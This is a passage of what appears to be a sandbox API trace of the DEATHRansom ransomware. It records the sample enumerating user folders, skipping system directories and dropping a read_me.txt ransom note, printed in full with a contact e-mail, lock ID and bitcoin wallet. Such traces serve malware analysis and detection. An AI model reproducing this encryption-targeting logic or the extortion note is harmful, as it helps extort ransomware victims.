lpSrch="all users") returned 0x0 [0075.161] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="appdata") returned 0x0 [0075.161] GetProcessHeap () returned 0x4f10000 [0075.161] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0075.161] lstrcpyW (in: lpString1=0x8ad0070, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0075.161] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 35 [0075.161] QueueUserWorkItem (Function=0x40a710, Context=0x8ad0070, Flags=0x0) returned 1 [0075.162] GetProcessHeap () returned 0x4f10000 [0075.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ae0078 [0075.162] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 35 [0075.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.162] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\.") returned 35 [0075.162] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.162] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.162] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.162] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\..") returned 36 [0075.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.162] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AppData", cAlternateFileName="")) returned 1 [0075.162] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 41 [0075.162] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0075.162] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0075.163] StrStrW (lpFirst="appdata", lpSrch="programdata") returned 0x0 [0075.163] StrStrW (lpFirst="appdata", lpSrch="$recycle.bin") returned 0x0 [0075.163] StrStrW (lpFirst="appdata", lpSrch="program files") returned 0x0 [0075.163] StrStrW (lpFirst="appdata", lpSrch="windows") returned 0x0 [0075.163] StrStrW (lpFirst="appdata", lpSrch="all users") returned 0x0 [0075.163] StrStrW (lpFirst="appdata", lpSrch="appdata") returned="appdata" [0075.163] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0075.163] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned 50 [0075.163] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0075.163] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0075.163] StrStrW (lpFirst="application data", lpSrch="programdata") returned 0x0 [0075.163] StrStrW (lpFirst="application data", lpSrch="$recycle.bin") returned 0x0 [0075.163] StrStrW (lpFirst="application data", lpSrch="program files") returned 0x0 [0075.163] StrStrW (lpFirst="application data", lpSrch="windows") returned 0x0 [0075.163] StrStrW (lpFirst="application data", lpSrch="all users") returned 0x0 [0075.163] StrStrW (lpFirst="application data", lpSrch="appdata") returned 0x0 [0075.163] GetProcessHeap () returned 0x4f10000 [0075.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0075.164] lstrcpyW (in: lpString1=0x8af0080, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0075.164] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 36 [0075.164] QueueUserWorkItem (Function=0x40a710, Context=0x8af0080, Flags=0x0) returned 1 [0075.164] GetProcessHeap () returned 0x4f10000 [0075.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0075.164] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned 52 [0075.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x10, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="", cAlternateFileName="\x07")) returned 0xffffffff [0075.165] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\read_me.txt") returned 62 [0075.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.165] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.165] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.166] CloseHandle (hObject=0x7a0) returned 1 [0075.167] GetProcessHeap () returned 0x4f10000 [0075.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0075.167] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Contacts", cAlternateFileName="")) returned 1 [0075.167] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 42 [0075.167] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0075.167] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0075.167] StrStrW (lpFirst="contacts", lpSrch="programdata") returned 0x0 [0075.167] StrStrW (lpFirst="contacts", lpSrch="$recycle.bin") returned 0x0 [0075.167] StrStrW (lpFirst="contacts", lpSrch="program files") returned 0x0 [0075.167] StrStrW (lpFirst="contacts", lpSrch="windows") returned 0x0 [0075.167] StrStrW (lpFirst="contacts", lpSrch="all users") returned 0x0 [0075.167] StrStrW (lpFirst="contacts", lpSrch="appdata") returned 0x0 [0075.167] GetProcessHeap () returned 0x4f10000 [0075.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0075.167] lstrcpyW (in: lpString1=0x8b00088, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0075.167] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 37 [0075.167] QueueUserWorkItem (Function=0x40a710, Context=0x8b00088, Flags=0x0) returned 1 [0075.167] GetProcessHeap () returned 0x4f10000 [0075.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b10090 [0075.168] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned 44 [0075.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.168] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.") returned 44 [0075.168] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.168] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.168] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\..") returned 45 [0075.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0075.169] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0075.169] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.169] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt") returned 54 [0075.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.170] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.170] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.170] CloseHandle (hObject=0x7a0) returned 1 [0075.171] GetProcessHeap () returned 0x4f10000 [0075.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b10090 | out: hHeap=0x4f10000) returned 1 [0075.171] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Cookies", cAlternateFileName="")) returned 1 [0075.171] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned 41 [0075.171] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0075.171] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0075.171] StrStrW (lpFirst="cookies", lpSrch="programdata") returned 0x0 [0075.171] StrStrW (lpFirst="cookies", lpSrch="$recycle.bin") returned 0x0 [0075.171] StrStrW (lpFirst="cookies", lpSrch="program files") returned 0x0 [0075.171] StrStrW (lpFirst="cookies", lpSrch="windows") returned 0x0 [0075.171] StrStrW (lpFirst="cookies", lpSrch="all users") returned 0x0 [0075.171] StrStrW (lpFirst="cookies", lpSrch="appdata") returned 0x0 [0075.171] GetProcessHeap () returned 0x4f10000 [0075.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b10090 [0075.171] lstrcpyW (in: lpString1=0x8b10090, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0075.171] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 38 [0075.171] QueueUserWorkItem (Function=0x40a710, Context=0x8b10090, Flags=0x0) returned 1 [0075.171] GetProcessHeap () returned 0x4f10000 [0075.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0075.172] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned 43 [0075.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sikvnb huvuib.contact", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.172] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | 